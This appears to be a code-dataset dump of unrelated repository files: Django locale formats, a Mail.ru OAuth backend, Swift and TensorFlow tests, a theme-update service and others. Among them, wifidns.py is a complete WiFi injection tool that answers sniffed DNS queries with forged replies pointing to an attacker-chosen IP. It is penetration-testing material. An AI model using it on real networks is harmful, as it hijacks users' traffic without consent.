mail_mail_obj = Mail.browse(cr, uid, Mail.create(cr, uid, mail_values, context=context), context=context)
unsubscribe_url = Mail._get_unsubscribe_url(cr, uid, mail_mail_obj, test_mail, context=context)
body = tools.append_content_to_html(mailing.body_html, unsubscribe_url, plaintext=False, container_tag='p')
Mail.write(cr, uid, mail_mail_obj.id, {'body_html': mailing.body_html}, context=context)
mail_ids.append(mail_mail_obj.id)
Mail.send(cr, uid, mail_ids, context=context)
self.pool['mail.mass_mailing'].write(cr, uid, [mailing.id], {'state': 'test'}, context=context)
return True
|
nvbn/python-social-auth | refs/heads/master | social/backends/mailru.py | 1 | """
Mail.ru OAuth2 support
Take a look to http://api.mail.ru/docs/guides/oauth/
You need to register OAuth site here:
http://api.mail.ru/sites/my/add
Then update your settings values using registration information
"""
from hashlib import md5
from social.p3 import unquote
from social.backends.oauth import BaseOAuth2
class MailruOAuth2(BaseOAuth2):
"""Mail.ru authentication backend"""
name = 'mailru-oauth2'
ID_KEY = 'uid'
AUTHORIZATION_URL = 'https://connect.mail.ru/oauth/authorize'
ACCESS_TOKEN_URL = 'https://connect.mail.ru/oauth/token'
ACCESS_TOKEN_METHOD = 'POST'
EXTRA_DATA = [('refresh_token', 'refresh_token'),
('expires_in', 'expires')]
def get_user_details(self, response):
"""Return user details from Mail.ru request"""
values = {'username': unquote(response['nick']),
'email': unquote(response['email']),
'first_name': unquote(response['first_name']),
'last_name': unquote(response['last_name'])}
if values['first_name'] and values['last_name']:
values['fullname'] = '{0} {1}'.format(values['first_name'],
values['last_name'])
return values
def user_data(self, access_token, *args, **kwargs):
"""Return user data from Mail.ru REST API"""
key, secret = self.get_key_and_secret()
data = {'method': 'users.getInfo',
'session_key': access_token,
'app_id': key,
'secure': '1'}
param_list = sorted(list(item + '=' + data[item] for item in data))
data['sig'] = md5(''.join(param_list) + secret).hexdigest()
return self.get_json('http://www.appsmail.ru/platform/api',
params=data)
|
Trafire/purchaseorders | refs/heads/master | lib/python2.7/sre_compile.py | 4 | /usr/lib/python2.7/sre_compile.py |
craigderington/studentloan5 | refs/heads/master | studentloan5/Lib/site-packages/django/conf/locale/nl/formats.py | 117 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '20 januari 2009'
TIME_FORMAT = 'H:i' # '15:23'
DATETIME_FORMAT = 'j F Y H:i' # '20 januari 2009 15:23'
YEAR_MONTH_FORMAT = 'F Y' # 'januari 2009'
MONTH_DAY_FORMAT = 'j F' # '20 januari'
SHORT_DATE_FORMAT = 'j-n-Y' # '20-1-2009'
SHORT_DATETIME_FORMAT = 'j-n-Y H:i' # '20-1-2009 15:23'
FIRST_DAY_OF_WEEK = 1 # Monday (in Dutch 'maandag')
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d-%m-%Y', '%d-%m-%y', # '20-01-2009', '20-01-09'
'%d/%m/%Y', '%d/%m/%y', # '20/01/2009', '20/01/09'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 09'
)
# Kept ISO formats as one is in first position
TIME_INPUT_FORMATS = (
'%H:%M:%S', # '15:23:35'
'%H:%M:%S.%f', # '15:23:35.000200'
'%H.%M:%S', # '15.23:35'
'%H.%M:%S.%f', # '15.23:35.000200'
'%H.%M', # '15.23'
'%H:%M', # '15:23'
)
DATETIME_INPUT_FORMATS = (
# With time in %H:%M:%S :
'%d-%m-%Y %H:%M:%S', '%d-%m-%y %H:%M:%S', '%Y-%m-%d %H:%M:%S',
# '20-01-2009 15:23:35', '20-01-09 15:23:35', '2009-01-20 15:23:35'
'%d/%m/%Y %H:%M:%S', '%d/%m/%y %H:%M:%S', '%Y/%m/%d %H:%M:%S',
# '20/01/2009 15:23:35', '20/01/09 15:23:35', '2009/01/20 15:23:35'
# '%d %b %Y %H:%M:%S', '%d %b %y %H:%M:%S', # '20 jan 2009 15:23:35', '20 jan 09 15:23:35'
# '%d %B %Y %H:%M:%S', '%d %B %y %H:%M:%S', # '20 januari 2009 15:23:35', '20 januari 2009 15:23:35'
# With time in %H:%M:%S.%f :
'%d-%m-%Y %H:%M:%S.%f', '%d-%m-%y %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S.%f',
# '20-01-2009 15:23:35.000200', '20-01-09 15:23:35.000200', '2009-01-20 15:23:35.000200'
'%d/%m/%Y %H:%M:%S.%f', '%d/%m/%y %H:%M:%S.%f', '%Y/%m/%d %H:%M:%S.%f',
# '20/01/2009 15:23:35.000200', '20/01/09 15:23:35.000200', '2009/01/20 15:23:35.000200'
# With time in %H.%M:%S :
'%d-%m-%Y %H.%M:%S', '%d-%m-%y %H.%M:%S', # '20-01-2009 15.23:35', '20-01-09 15.23:35'
'%d/%m/%Y %H.%M:%S', '%d/%m/%y %H.%M:%S', # '20/01/2009 15.23:35', '20/01/09 15.23:35'
# '%d %b %Y %H.%M:%S', '%d %b %y %H.%M:%S', # '20 jan 2009 15.23:35', '20 jan 09 15.23:35'
# '%d %B %Y %H.%M:%S', '%d %B %y %H.%M:%S', # '20 januari 2009 15.23:35', '20 januari 2009 15.23:35'
# With time in %H.%M:%S.%f :
'%d-%m-%Y %H.%M:%S.%f', '%d-%m-%y %H.%M:%S.%f', # '20-01-2009 15.23:35.000200', '20-01-09 15.23:35.000200'
'%d/%m/%Y %H.%M:%S.%f', '%d/%m/%y %H.%M:%S.%f', # '20/01/2009 15.23:35.000200', '20/01/09 15.23:35.000200'
# With time in %H:%M :
'%d-%m-%Y %H:%M', '%d-%m-%y %H:%M', '%Y-%m-%d %H:%M', # '20-01-2009 15:23', '20-01-09 15:23', '2009-01-20 15:23'
'%d/%m/%Y %H:%M', '%d/%m/%y %H:%M', '%Y/%m/%d %H:%M', # '20/01/2009 15:23', '20/01/09 15:23', '2009/01/20 15:23'
# '%d %b %Y %H:%M', '%d %b %y %H:%M', # '20 jan 2009 15:23', '20 jan 09 15:23'
# '%d %B %Y %H:%M', '%d %B %y %H:%M', # '20 januari 2009 15:23', '20 januari 2009 15:23'
# With time in %H.%M :
'%d-%m-%Y %H.%M', '%d-%m-%y %H.%M', # '20-01-2009 15.23', '20-01-09 15.23'
'%d/%m/%Y %H.%M', '%d/%m/%y %H.%M', # '20/01/2009 15.23', '20/01/09 15.23'
# '%d %b %Y %H.%M', '%d %b %y %H.%M', # '20 jan 2009 15.23', '20 jan 09 15.23'
# '%d %B %Y %H.%M', '%d %B %y %H.%M', # '20 januari 2009 15.23', '20 januari 2009 15.23'
# Without time :
'%d-%m-%Y', '%d-%m-%y', '%Y-%m-%d', # '20-01-2009', '20-01-09', '2009-01-20'
'%d/%m/%Y', '%d/%m/%y', '%Y/%m/%d', # '20/01/2009', '20/01/09', '2009/01/20'
# '%d %b %Y', '%d %b %y', # '20 jan 2009', '20 jan 09'
# '%d %B %Y', '%d %B %y', # '20 januari 2009', '20 januari 2009'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
|
dfdx2/django | refs/heads/master | tests/check_framework/urls/beginning_with_slash.py | 76 | from django.conf.urls import url
urlpatterns = [
url(r'/starting-with-slash/$', lambda x: x),
]
|
flyfei/python-for-android | refs/heads/master | python3-alpha/python3-src/Lib/test/badsyntax_future6.py | 383 | """This is a test"""
"this isn't a doc string"
from __future__ import nested_scopes
def f(x):
def g(y):
return x + y
return g
result = f(2)(4)
|
SuriyaaKudoIsc/olympia | refs/heads/master | services/theme_update.py | 16 | import base64
import json
import os
import posixpath
import re
from time import time
from wsgiref.handlers import format_date_time
from constants import base
from utils import log_configure, log_exception, mypool
from services.utils import settings, user_media_path, user_media_url
# Configure the log.
log_configure()
# This has to be imported after the settings (utils).
from django_statsd.clients import statsd
class ThemeUpdate(object):
def __init__(self, locale, id_, qs=None):
self.conn, self.cursor = None, None
self.from_gp = qs == 'src=gp'
self.data = {
'locale': locale,
'id': id_,
# If we came from getpersonas.com, then look up by `persona_id`.
# Otherwise, look up `addon_id`.
'primary_key': 'persona_id' if self.from_gp else 'addon_id',
'atype': base.ADDON_PERSONA,
'row': {}
}
if not self.cursor:
self.conn = mypool.connect()
self.cursor = self.conn.cursor()
def base64_icon(self, addon_id):
path = self.image_path('icon.jpg')
if not os.path.isfile(path):
return ''
try:
with open(path, 'r') as f:
return base64.b64encode(f.read())
except IOError, e:
if len(e.args) == 1:
log_exception('I/O error: {0}'.format(e[0]))
else:
log_exception('I/O error({0}): {1}'.format(e[0], e[1]))
return ''
def get_headers(self, length):
return [('Cache-Control', 'public, max-age=3600'),
('Content-Length', str(length)),
('Content-Type', 'application/json'),
('Expires', format_date_time(time() + 3600)),
('Last-Modified', format_date_time(time()))]
def get_update(self):
"""
TODO:
* When themes have versions let's not use
`personas.approve` as a `modified` timestamp. Either set this
during theme approval, or let's keep a hash of the header and
footer.
* Do a join on `addons_users` to get the actual correct user.
We're cheating and setting `personas.display_username` during
submission/management heh. But `personas.author` and
`personas.display_username` are not what we want.
"""
sql = """
SELECT p.persona_id, a.id, a.slug, v.version,
t_name.localized_string AS name,
t_desc.localized_string AS description,
p.display_username, p.header,
p.footer, p.accentcolor, p.textcolor,
UNIX_TIMESTAMP(a.modified) AS modified
FROM addons AS a
LEFT JOIN personas AS p ON p.addon_id=a.id
LEFT JOIN versions AS v ON a.current_version=v.id
LEFT JOIN translations AS t_name
ON t_name.id=a.name AND t_name.locale=%(locale)s
LEFT JOIN translations AS t_desc
ON t_desc.id=a.summary AND t_desc.locale=%(locale)s
WHERE p.{primary_key}=%(id)s AND
a.addontype_id=%(atype)s AND a.status=4 AND a.inactive=0
""".format(primary_key=self.data['primary_key'])
self.cursor.execute(sql, self.data)
row = self.cursor.fetchone()
row_to_dict = lambda row: dict(zip((
'persona_id', 'addon_id', 'slug', 'current_version', 'name',
'description', 'username', 'header', 'footer', 'accentcolor',
'textcolor', 'modified'),
list(row)))
if row:
self.data['row'] = row_to_dict(row)
# Fall back to `en-US` if the name was null for our locale.
# TODO: Write smarter SQL and don't rerun the whole query.
if not self.data['row']['name']:
self.data['locale'] = 'en-US'
self.cursor.execute(sql, self.data)
row = self.cursor.fetchone()
if row:
self.data['row'] = row_to_dict(row)
return True
return False
# TODO: Cache on row['modified']
def get_json(self):
if not self.get_update():
# Persona not found.
return
row = self.data['row']
accent = row.get('accentcolor')
text = row.get('textcolor')
id_ = str(row[self.data['primary_key']])
data = {
'id': id_,
'name': row.get('name'),
'description': row.get('description'),
# TODO: Change this to be `addons_users.user.username`.
'author': row.get('username'),
# TODO: Change this to be `addons_users.user.display_name`.
'username': row.get('username'),
'headerURL': self.image_url(row['header']),
'footerURL': self.image_url(row['footer']),
'detailURL': self.locale_url(settings.SITE_URL,
'/addon/%s/' % row['slug']),
'previewURL': self.image_url('preview.png'),
'iconURL': self.image_url('icon.png'),
'dataurl': self.base64_icon(row['addon_id']),
'accentcolor': '#%s' % accent if accent else None,
'textcolor': '#%s' % text if text else None,
'updateURL': self.locale_url(settings.VAMO_URL,
'/themes/update-check/' + id_),
# 04-25-2013: Bumped for GP migration so we get new `updateURL`s.
'version': row.get('current_version', 0)
}
# If this theme was originally installed from getpersonas.com,
# we have to use the `<persona_id>?src=gp` version of the `updateURL`.
if self.from_gp:
data['updateURL'] += '?src=gp'
return json.dumps(data)
def image_path(self, filename):
row = self.data['row']
# Special cased for non-AMO-uploaded themes imported from getpersonas.
if row['persona_id'] != 0:
if filename == 'preview.png':
filename = 'preview.jpg'
elif filename == 'icon.png':
filename = 'preview_small.jpg'
return os.path.join(user_media_path('addons'), str(row['addon_id']),
filename)
def image_url(self, filename):
row = self.data['row']
# Special cased for non-AMO-uploaded themes imported from getpersonas.
if row['persona_id'] != 0:
if filename == 'preview.png':
filename = 'preview.jpg'
elif filename == 'icon.png':
filename = 'preview_small.jpg'
image_url = posixpath.join(user_media_url('addons'),
str(row['addon_id']), filename or '')
modified = int(row['modified']) if row['modified'] else 0
return '%s?%s' % (image_url, modified)
def locale_url(self, domain, url):
return '%s/%s%s' % (domain, self.data.get('locale', 'en-US'), url)
url_re = re.compile('(?P<locale>.+)?/themes/update-check/(?P<id>\d+)$')
def application(environ, start_response):
"""
Developing locally?
gunicorn -b 0.0.0.0:7000 -w 12 -k sync -t 90 --max-requests 5000 \
-n gunicorn-theme_update services.wsgi.theme_update:application
"""
status = '200 OK'
with statsd.timer('services.theme_update'):
data = environ['wsgi.input'].read()
try:
locale, id_ = url_re.match(environ['PATH_INFO']).groups()
locale = (locale or 'en-US').lstrip('/')
id_ = int(id_)
except AttributeError: # URL path incorrect.
start_response('404 Not Found', [])
return ['']
try:
update = ThemeUpdate(locale, id_, environ.get('QUERY_STRING'))
output = update.get_json()
if not output:
start_response('404 Not Found', [])
return ['']
start_response(status, update.get_headers(len(output)))
except:
log_exception(data)
raise
return [output]
|
mattesno1/CouchPotatoServer | refs/heads/master | libs/pyutil/randutil.py | 92 | # Copyright (c) 2002-2012 Zooko Wilcox-O'Hearn
# This file is part of pyutil; see README.rst for licensing terms.
import warnings
import os, random
try:
import hashexpand
class SHA256Random(hashexpand.SHA256Expander, random.Random):
def __init__(self, seed=None, deterministic=True):
warnings.warn("deprecated", DeprecationWarning)
if not deterministic:
raise NotImplementedError, "SHA256Expander is always deterministic. For non-deterministic, try urandomRandom."
hashexpand.SHA256Expander.__init__(self)
random.Random.__init__(self, seed)
self.seed(seed)
def seed(self, seed=None):
if seed is None:
import increasing_timer
seed = repr(increasing_timer.time())
hashexpand.SHA256Expander.seed(self, seed)
class SHA256Random(hashexpand.SHA256Expander, random.Random):
def __init__(self, seed=""):
warnings.warn("deprecated", DeprecationWarning)
hashexpand.SHA256Expander.__init__(self)
self.seed(seed)
def seed(self, seed=None):
if seed is None:
seed = os.urandom(32)
hashexpand.SHA256Expander.seed(self, seed)
except ImportError, le:
class InsecureSHA256Random:
def __init__(self, seed=None):
raise ImportError, le
class SHA256Random:
def __init__(self, seed=""):
raise ImportError, le
class devrandomRandom(random.Random):
""" The problem with using this one, of course, is that it blocks. This
is, of course, a security flaw. (On Linux and probably on other
systems.) --Zooko 2005-03-04
Not repeatable.
"""
def __init__(self):
warnings.warn("deprecated", DeprecationWarning)
self.dr = open("/dev/random", "r")
def get(self, bytes):
return self.dr.read(bytes)
class devurandomRandom(random.Random):
""" The problem with using this one is that it gives answers even when it
has never been properly seeded, e.g. when you are booting from CD and have
just started up and haven't yet gathered enough entropy to actually be
unguessable. (On Linux and probably on other systems.) --Zooko 2005-03-04
Not repeatable.
"""
def get(self, bytes):
warnings.warn("deprecated", DeprecationWarning)
return os.urandom(bytes)
randobj = devurandomRandom()
get = randobj.get
random = randobj.random
randrange = randobj.randrange
shuffle = randobj.shuffle
choice = randobj.choice
seed = randobj.seed
def randstr(n):
return ''.join(map(chr, map(randrange, [0]*n, [256]*n)))
def insecurerandstr(n):
return os.urandom(n)
|
gugahoi/maraschino | refs/heads/master | lib/flask/testsuite/test_apps/flask_broken/__init__.py | 629 | import flask.ext.broken.b
import missing_module
|
harayz/raspberry_pwn | refs/heads/master | src/pentest/wifitap/wifidns.py | 9 | #! /usr/bin/env python
########################################
#
# wifidns.py --- WiFi injection DNS answering tool based on Wifitap
#
# Copyright (C) 2005 Cedric Blancher <[email protected]>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation; version 2.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
#########################################
import os,sys,getopt,struct,re,string,logging
# Import Psyco if available to speed up execution
try:
import psyco
psyco.full()
except ImportError:
print "Psyco optimizer not installed, running anyway..."
pass
from socket import *
from fcntl import ioctl
from select import select
logging.getLogger("scapy").setLevel(1)
from scapy import Raw,Ether,PrismHeader,Dot11,Dot11WEP,LLC,SNAP,sendp,conf
# We want to build a DNS Query answering machine
from scapy import IP,UDP,DNS,DNSRR
IN_IFACE = "ath0"
OUT_IFACE = "ath0"
HAS_SMAC = 0
SMAC = ""
WEP = 0
KEYID = 0
DEBUG = 0
VERB = 0
TTL = 64
BSSID = ""
IPDNS = ""
WEPKEY = ""
def usage(status=0):
print "Usage: wifidns -b <BSSID> -a <IP> [-o <iface>] [-i <iface>]"
print " [-s <SMAC>] [-t <TTL>] [-w <WEP key>]"
print " [-k <key id>]] [-d [-v]] [-h]"
print " -b <BSSID> specify BSSID for injection"
print " -a <IP> specify IP address for DNS answers"
print " -t <TTL> Set TTL (default: 64)"
print " -o <iface> specify interface for injection (default: ath0)"
print " -i <iface> specify interface for listening (default: ath0)"
print " -s <SMAC> specify source MAC address for injected frames"
print " -w <key> WEP mode and key"
print " -k <key id> WEP key id (default: 0)"
print " -d activate debug"
print " -v verbose debugging"
print " -h this so helpful output"
sys.exit(status)
opts = getopt.getopt(sys.argv[1:],"b:a:o:i:s:t:w:k:dvh")
for opt,optarg in opts[0]:
if opt == "-b":
BSSID = optarg
elif opt == "-a":
IPDNS = optarg
elif opt == "-o":
OUT_IFACE = optarg
elif opt == "-i":
IN_IFACE = optarg
elif opt == "-s":
HAS_SMAC += 1
SMAC = optarg
elif opt == "-w":
WEP += 1
WEPKEY = optarg
elif opt == "-k":
KEYID = int(optarg)
elif opt == "-t":
TTL = int(optarg)
elif opt == "-d":
DEBUG += 1
elif opt == "-v":
VERB += 1
elif opt == "-h":
usage()
if not BSSID:
print "\nError: BSSID not defined\n"
usage()
if not IPDNS:
print "\nError: IP not defined\n"
usage()
# Match and parse BSSID
if re.match('^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$', BSSID):
BSSID = BSSID.lower()
else:
print "\nError: Wrong format for BSSID\n"
usage()
if HAS_SMAC:
if not SMAC:
print "\nError: SMAC not defined\n"
usage()
# Match and parse SMAC
elif re.match('^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$', SMAC):
SMAC = SMAC.lower()
else:
print "\nError: Wrong format for SMAC\n"
usage()
# Match and parse IP
if not re.match('^(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.(\d|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])$', IPDNS):
print "\nError: Wrong IP address\n"
usage()
print "IN_IFACE: %s" % IN_IFACE
print "OUT_IFACE: %s" % OUT_IFACE
print "BSSID: %s" % BSSID
if HAS_SMAC:
print "SMAC: %s" % SMAC
print "IP: %s" % IPDNS
if WEP:
# Match and parse WEP key
tmp_key = ""
if re.match('^([0-9a-fA-F]{2}){5}$', WEPKEY) or re.match ('^([0-9a-fA-F]{2}){13}$', WEPKEY):
tmp_key = WEPKEY
elif re.match('^([0-9a-fA-F]{2}[:]){4}[0-9a-fA-F]{2}$', WEPKEY) or re.match('^([0-9a-fA-F]{2}[:]){12}[0-9a-fA-F]{2}$', WEPKEY):
tmp_key = re.sub(':', '', WEPKEY)
elif re.match ('^([0-9a-fA-F]{4}[-]){2}[0-9a-fA-F]{2}$', WEPKEY) or re.match ('^([0-9a-fA-F]{4}[-]){6}[0-9a-fA-F]{2}$', WEPKEY):
tmp_key = re.sub('-', '', WEPKEY)
else:
print "\nError : Wrong format for WEP key\n"
usage()
g = lambda x: chr(int(tmp_key[::2][x],16)*16+int(tmp_key[1::2][x],16))
for i in range(len(tmp_key)/2):
conf.wepkey += g(i)
print "WEP key: %s (%dbits)" % (WEPKEY, len(tmp_key)*4)
if KEYID > 3 or KEYID < 0:
print "Key id: %s (defaulted to 0 due to wrong -k argument)" % KEYID
KEYID = 0
else:
print "Key id: %s" % KEYID
else:
if KEYID != 0:
print "WEP not activated, key id ignored"
print "TTL: %s" % TTL
if not DEBUG:
if VERB:
print "DEBUG not activated, verbosity ignored"
else:
print "DEBUG activated"
if VERB:
print "Verbose debugging"
conf.iface = OUT_IFACE
# Here we put a BPF filter so only 802.11 Data/to-DS frames are captured
s = conf.L2listen(iface = IN_IFACE,
filter = "link[0]&0xc == 8 and link[1]&0xf == 1")
# Speed optimization si Scapy does not have to parse payloads
DNS.payload_guess=[]
try:
while 1:
dot11_frame = s.recv(2346)
# WEP handling is automagicly done by Scapy if conf.wepkey is set
# Nothing to do to decrypt
# WEP frames have Dot11WEP layer, others don't
if DEBUG and VERB:
if dot11_frame.haslayer(Dot11WEP): # WEP frame
os.write(1,"Received WEP from %s\n" % IN_IFACE)
else: # Cleartext frame
os.write(1,"Received from %s\n" % IN_IFACE)
os.write(1,"%s\n" % dot11_frame.summary())
if dot11_frame.getlayer(Dot11).addr1 != BSSID:
continue
# Identifying DNS Queries
if dot11_frame.haslayer(DNS) and dot11_frame.getlayer(DNS).qr == 0:
if DEBUG:
os.write(1,"Received DNS Query on %s\n" % IN_IFACE)
if VERB:
os.write(1,"%s\n" % dot11_frame.summary())
# Building DNS Reply answer for injection
dot11_answer = Dot11(
type = "Data",
FCfield = "from-DS",
addr1 = dot11_frame.getlayer(Dot11).addr2,
addr2 = BSSID)
if not HAS_SMAC:
dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1
else:
dot11_answer.addr3 = SMAC
if WEP:
dot11_answer.FCfield |= 0x40
dot11_answer /= Dot11WEP(
iv = "111",
keyid = KEYID)
dot11_answer /= LLC(ctrl = 3)/SNAP()/IP(
src = dot11_frame.getlayer(IP).dst,
dst = dot11_frame.getlayer(IP).src,
ttl = TTL)
dot11_answer /= UDP(
sport = dot11_frame.getlayer(UDP).dport,
dport = dot11_frame.getlayer(UDP).sport)
dot11_answer /= DNS(
id = dot11_frame.getlayer(DNS).id,
qr = 1,
qd = dot11_frame.getlayer(DNS).qd,
an = DNSRR(
rrname = dot11_frame.getlayer(DNS).qd.qname,
ttl = 10,
rdata = IPDNS)
)
if DEBUG:
os.write(1,"Sending DNS Reply on %s\n" % OUT_IFACE)
if VERB:
os.write(1,"%s\n" % dot11_frame.summary())
# Frame injection :
sendp(dot11_answer,verbose=0) # Send frame
# Program killed
except KeyboardInterrupt:
print "Stopped by user."
s.close()
sys.exit()
|
anishnarang/gswift | refs/heads/master | test/unit/common/test_base_storage_server.py | 26 | # Copyright (c) 2010-2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import os
from swift.common.base_storage_server import BaseStorageServer
from tempfile import mkdtemp
from swift import __version__ as swift_version
from swift.common.swob import Request
from swift.common.utils import get_logger, public
from shutil import rmtree
class FakeOPTIONS(BaseStorageServer):
server_type = 'test-server'
def __init__(self, conf, logger=None):
super(FakeOPTIONS, self).__init__(conf)
self.logger = logger or get_logger(conf, log_route='test-server')
class FakeANOTHER(FakeOPTIONS):
@public
def ANOTHER(self):
"""this is to test adding to allowed_methods"""
pass
class TestBaseStorageServer(unittest.TestCase):
"""Test swift.common.base_storage_server"""
def setUp(self):
self.tmpdir = mkdtemp()
self.testdir = os.path.join(self.tmpdir,
'tmp_test_base_storage_server')
def tearDown(self):
"""Tear down for testing swift.common.base_storage_server"""
rmtree(self.tmpdir)
def test_server_type(self):
conf = {'devices': self.testdir, 'mount_check': 'false'}
baseserver = BaseStorageServer(conf)
msg = 'Storage nodes have not implemented the Server type.'
try:
baseserver.server_type
except NotImplementedError as e:
self.assertEquals(str(e), msg)
def test_allowed_methods(self):
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}
# test what's available in the base class
allowed_methods_test = FakeOPTIONS(conf).allowed_methods
self.assertEquals(allowed_methods_test, ['OPTIONS'])
# test that a subclass can add allowed methods
allowed_methods_test = FakeANOTHER(conf).allowed_methods
allowed_methods_test.sort()
self.assertEquals(allowed_methods_test, ['ANOTHER', 'OPTIONS'])
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'true'}
# test what's available in the base class
allowed_methods_test = FakeOPTIONS(conf).allowed_methods
self.assertEquals(allowed_methods_test, [])
# test that a subclass can add allowed methods
allowed_methods_test = FakeANOTHER(conf).allowed_methods
self.assertEquals(allowed_methods_test, [])
conf = {'devices': self.testdir, 'mount_check': 'false'}
# test what's available in the base class
allowed_methods_test = FakeOPTIONS(conf).allowed_methods
self.assertEquals(allowed_methods_test, ['OPTIONS'])
# test that a subclass can add allowed methods
allowed_methods_test = FakeANOTHER(conf).allowed_methods
allowed_methods_test.sort()
self.assertEquals(allowed_methods_test, ['ANOTHER', 'OPTIONS'])
def test_OPTIONS_error(self):
msg = 'Storage nodes have not implemented the Server type.'
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}
baseserver = BaseStorageServer(conf)
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
try:
baseserver.OPTIONS(req)
except NotImplementedError as e:
self.assertEquals(str(e), msg)
def test_OPTIONS(self):
conf = {'devices': self.testdir, 'mount_check': 'false',
'replication_server': 'false'}
req = Request.blank('/sda1/p/a/c/o', {'REQUEST_METHOD': 'OPTIONS'})
req.content_length = 0
resp = FakeOPTIONS(conf).OPTIONS(req)
self.assertEquals(resp.headers['Allow'], 'OPTIONS')
self.assertEquals(resp.headers['Server'],
'test-server/' + swift_version)
|
teamtuga4/teamtuga4ever.repository | refs/heads/master | script.module.urlresolver/lib/urlresolver/plugins/vidzi.py | 4 | '''
vidzi urlresolver plugin
Copyright (C) 2014 Eldorado
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
import urllib
from lib import jsunpack
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
class VidziResolver(UrlResolver):
name = "vidzi"
domains = ["vidzi.tv"]
pattern = '(?://|\.)(vidzi\.tv)/(?:embed-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
html = self.net.http_GET(web_url).content
if '404 Not Found' in html:
raise ResolverError('File Not Found or removed')
r = re.search('file\s*:\s*"([^"]+)', html)
if r:
return r.group(1) + '|' + urllib.urlencode({'Referer': 'http://vidzi.tv/nplayer/jwplayer.flash.swf'})
else:
for match in re.finditer('(eval\(function.*?)</script>', html, re.DOTALL):
js_data = jsunpack.unpack(match.group(1))
r = re.search('file\s*:\s*"([^"]+)', js_data)
if r:
return r.group(1)
raise ResolverError('Unable to locate link')
def get_url(self, host, media_id):
return 'http://%s/embed-%s.html' % (host, media_id)
def get_host_and_id(self, url):
r = re.search(self.pattern, url)
if r:
return r.groups()
else:
return False
def valid_url(self, url, host):
return re.search(self.pattern, url) or self.name in host
|
sandeepgupta2k4/tensorflow | refs/heads/master | tensorflow/python/framework/file_system_test.py | 36 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import load_library
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class FileSystemTest(test.TestCase):
def setUp(self):
file_system_library = os.path.join(resource_loader.get_data_files_path(),
"test_file_system.so")
load_library.load_file_system_library(file_system_library)
def testBasic(self):
with self.test_session() as sess:
reader = io_ops.WholeFileReader("test_reader")
queue = data_flow_ops.FIFOQueue(99, [dtypes.string], shapes=())
queue.enqueue_many([["test://foo"]]).run()
queue.close().run()
key, value = sess.run(reader.read(queue))
self.assertEqual(key, compat.as_bytes("test://foo"))
self.assertEqual(value, compat.as_bytes("AAAAAAAAAA"))
if __name__ == "__main__":
test.main()
|
Subsets and Splits